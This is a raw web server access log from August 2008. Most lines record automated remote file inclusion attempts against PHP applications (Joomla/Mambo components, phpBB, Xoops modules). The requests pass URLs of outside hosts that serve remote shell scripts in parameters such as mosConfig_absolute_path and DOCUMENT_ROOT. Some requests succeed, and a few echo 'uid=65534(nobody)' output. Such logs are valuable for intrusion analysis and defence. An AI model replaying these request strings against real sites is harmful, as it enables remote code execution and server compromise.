66.135.41.76 - - [19/Aug/2008:11:04:32 -0700] "GET /logs/access_080211.log//skin/zero_vote/error.php?dir=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
86.58.154.237 - - [19/Aug/2008:11:04:36 -0700] "GET /logs/access_080606.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:11:04:40 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
86.58.154.237 - - [19/Aug/2008:11:04:41 -0700] "GET /logs/access_080530.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:11:04:42 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 200 9932 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:11:04:45 -0700] "GET /logs/access_080530.log%20/index.php?place=http://123fuck.t35.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:11:04:45 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:11:04:46 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 200 9932 "-" "libwww-perl/5.812" "www.dmulk.com"
85.234.144.44 - - [19/Aug/2008:11:04:57 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.topyn.com/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.234.144.44 - - [19/Aug/2008:11:04:58 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.topyn.com/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.13.99.43 - - [19/Aug/2008:11:04:59 -0700] "GET /logs/access_080717.log//admin/frontpage_right.php?loadadminpage=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.218.85.18 - - [19/Aug/2008:11:05:02 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://freewebs.com/brutusman/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/Aug/2008:11:05:03 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://freewebs.com/brutusman/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.6 - - [19/Aug/2008:11:05:09 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [19/Aug/2008:11:05:09 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.236.10.71 - - [19/Aug/2008:11:05:14 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.236.10.71 - - [19/Aug/2008:11:05:14 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.65.79 - - [19/Aug/2008:11:05:20 -0700] "GET /logs/access_080327.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [19/Aug/2008:11:05:20 -0700] "GET /logs/access_080327.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.degeheimedienst.nl/dgd/include/inc_act/sistcmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:11:05:27 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:11:05:36 -0700] "GET /logs/access_080404.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:11:05:37 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:11:05:37 -0700] "GET /logs/access_080601.log/!scanhttp://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:11:05:37 -0700] "GET /!scanhttp://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.230.21.231 - - [19/Aug/2008:11:05:41 -0700] "GET /logs/access_080530.log//modules/xfsection/modify.php?dir_module=http://albforum.freehostia.com/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.21.231 - - [19/Aug/2008:11:05:47 -0700] "GET /logs/access_080601.log//modules/xfsection/modify.php?dir_module=http://albforum.freehostia.com/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.19.158.41 - - [19/Aug/2008:11:06:02 -0700] "GET /logs/access_080126.log//modules/xfsection/modify.php?dir_module=http://viniciu-s.net/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.66.242 - - [19/Aug/2008:11:06:05 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [19/Aug/2008:11:06:05 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:11:06:06 -0700] "GET /logs/access_080404.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:11:06:06 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:11:06:06 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.172.140.17 - - [19/Aug/2008:11:06:11 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.172.140.17 - - [19/Aug/2008:11:06:11 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.172.140.17 - - [19/Aug/2008:11:06:12 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.66.242 - - [19/Aug/2008:11:06:14 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [19/Aug/2008:11:06:14 -0700] "GET //index.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 200 9865 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [19/Aug/2008:11:06:14 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [19/Aug/2008:11:06:17 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [19/Aug/2008:11:06:17 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [19/Aug/2008:11:06:18 -0700] "GET /logs/access_080724.log//index.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.218.85.18 - - [19/Aug/2008:11:06:24 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=uid=65534(nobody)%20gid=65534(nobody)%20groups=65534(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/Aug/2008:11:06:24 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=uid=65534(nobody)%20gid=65534(nobody)%20groups=65534(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.66.242 - - [19/Aug/2008:11:06:33 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:11:06:33 -0700] "GET /blane/?M=D HTTP/1.0" 200 649 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.66.242 - - [19/Aug/2008:11:06:34 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:11:06:34 -0700] "GET /funny/Mencanmultitask.asx HTTP/1.0" 200 817843 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:11:06:36 -0700] "GET /logs/access_071105.log HTTP/1.0" 200 54880 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:11:06:47 -0700] "GET /logs/home.php?x=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.205.121.169 - - [19/Aug/2008:11:06:49 -0700] "GET /logs/access_080720.log/index.php?_zb_path=http://www.borsaimmobiliare.net/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:11:06:50 -0700] "GET /home.php?x=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.205.121.169 - - [19/Aug/2008:11:06:50 -0700] "GET /index.php?_zb_path=http://www.borsaimmobiliare.net/images/readme.txt? HTTP/1.1" 200 9885 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.121.169 - - [19/Aug/2008:11:06:51 -0700] "GET /logs/index.php?_zb_path=http://www.borsaimmobiliare.net/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.67.201 - - [19/Aug/2008:11:06:52 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0010.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" "dmulk.com"
204.13.99.43 - - [19/Aug/2008:11:06:54 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.13.99.43 - - [19/Aug/2008:11:06:54 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:11:06:58 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.205.121.169 - - [19/Aug/2008:11:07:00 -0700] "GET /logs/access_080720.log/index.php?_zb_path=http://www.borsaimmobiliare.net/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.121.169 - - [19/Aug/2008:11:07:01 -0700] "GET /index.php?_zb_path=http://www.borsaimmobiliare.net/images/readme.txt? HTTP/1.1" 200 9885 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.121.169 - - [19/Aug/2008:11:07:02 -0700] "GET /logs/index.php?_zb_path=http://www.borsaimmobiliare.net/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.6 - - [19/Aug/2008:11:07:03 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [19/Aug/2008:11:07:03 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:11:07:29 -0700] "GET /logs/access_080803.log/index.php?place=http://123fuck.t35.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:11:07:36 -0700] "GET /logs/access_080510.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:11:07:45 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:11:07:46 -0700] "GET //index.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 200 9865 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:11:07:49 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:11:07:49 -0700] "GET /logs/access_080724.log//index.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:11:07:50 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://idar.no-ip.org/sanmateo/images/admin/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:11:07:50 -0700] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://idar.no-ip.org/sanmateo/images/admin/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:11:07:57 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:11:07:58 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 200 9932 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:11:08:00 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:11:08:01 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 200 9932 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:11:08:05 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:11:08:09 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:11:08:46 -0700] "GET /logs/access_080510.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:11:09:14 -0700] "GET /logs/errors.php?error=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:11:09:14 -0700] "GET /errors.php?error=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:11:09:28 -0700] "GET /logs/access_080404.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
140.117.241.99 - - [19/Aug/2008:11:09:42 -0700] "GET /logs/access_080717.log//?path%5Bdocroot%5D=http://www.saddlebrookhorsecenter.com/Events///////////ws/gabungan.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [19/Aug/2008:11:09:42 -0700] "GET /logs/access_080410.log//?path%5Bdocroot%5D=http://www.saddlebrookhorsecenter.com/Events///////////ws/gabungan.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [19/Aug/2008:11:09:42 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.saddlebrookhorsecenter.com/Events///////////ws/gabungan.txt?%0D?? HTTP/1.1" 200 61289 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [19/Aug/2008:11:09:43 -0700] "GET //?path%5Bdocroot%5D=http://www.saddlebrookhorsecenter.com/Events///////////ws/gabungan.txt?%0D?? HTTP/1.1" 200 9946 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.188 - - [19/Aug/2008:11:09:43 -0700] "GET /logs/access_080404.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:10:12 -0700] "GET /logs//mvcw.php?step=1&vwar_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:10:12 -0700] "GET //mvcw.php?step=1&vwar_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.73.82.13 - - [19/Aug/2008:11:10:33 -0700] "GET /logs/access_080126.log//modules/xfsection/modify.php?dir_module=http://mos1.altervista.org/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:11:11:38 -0700] "GET /logs/access_080626.log/errors.php?error=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:11:11:53 -0700] "GET /logs/errors.php?error=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:11:11:53 -0700] "GET /errors.php?error=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:11:11:55 -0700] "GET /logs/access_080606.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:11:12:00 -0700] "GET /logs/access_080530.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:11:12:10 -0700] "GET /logs/access_080804.log/errors.php?error=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:11:12:11 -0700] "GET /errors.php?error=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:11:12:11 -0700] "GET /logs/errors.php?error=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:11:12:32 -0700] "GET /logs/errors.php?error=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:11:12:33 -0700] "GET /errors.php?error=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:13:02 -0700] "GET /logs/access_080804.log/errors.php?error=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:13:02 -0700] "GET /errors.php?error=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:13:02 -0700] "GET /logs/errors.php?error=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.6.7 - - [19/Aug/2008:11:13:19 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.borsaimmobiliare.net/images/readme.txt? HTTP/1.1" 200 9890 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:11:13:22 -0700] "GET /logs/access_080408.log/errors.php?error=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:11:13:32 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:11:13:36 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:13:59 -0700] "GET /logs/access_080408.log/errors.php?error=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:11:14:31 -0700] "GET /logs/errors.php?error=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:11:14:32 -0700] "GET /errors.php?error=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:11:14:39 -0700] "GET //modules/netcat/index.php?DOCUMENT_ROOT=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:11:14:55 -0700] "GET /logs/errors.php?error=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:11:14:55 -0700] "GET /errors.php?error=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.26.63.13 - - [19/Aug/2008:11:14:59 -0700] "GET /logs/index.php?DOCUMENT_ROOT=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.13 - - [19/Aug/2008:11:15:03 -0700] "GET /index.php?DOCUMENT_ROOT=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 200 9878 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [19/Aug/2008:11:15:34 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://freewebs.com/brutusman/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/Aug/2008:11:15:34 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=uid=65534(nobody)%20gid=65534(nobody)%20groups=65534(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/Aug/2008:11:15:35 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://freewebs.com/brutusman/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/Aug/2008:11:15:35 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=uid=65534(nobody)%20gid=65534(nobody)%20groups=65534(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.112.75 - - [19/Aug/2008:11:15:40 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.64.112.75 - - [19/Aug/2008:11:15:40 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
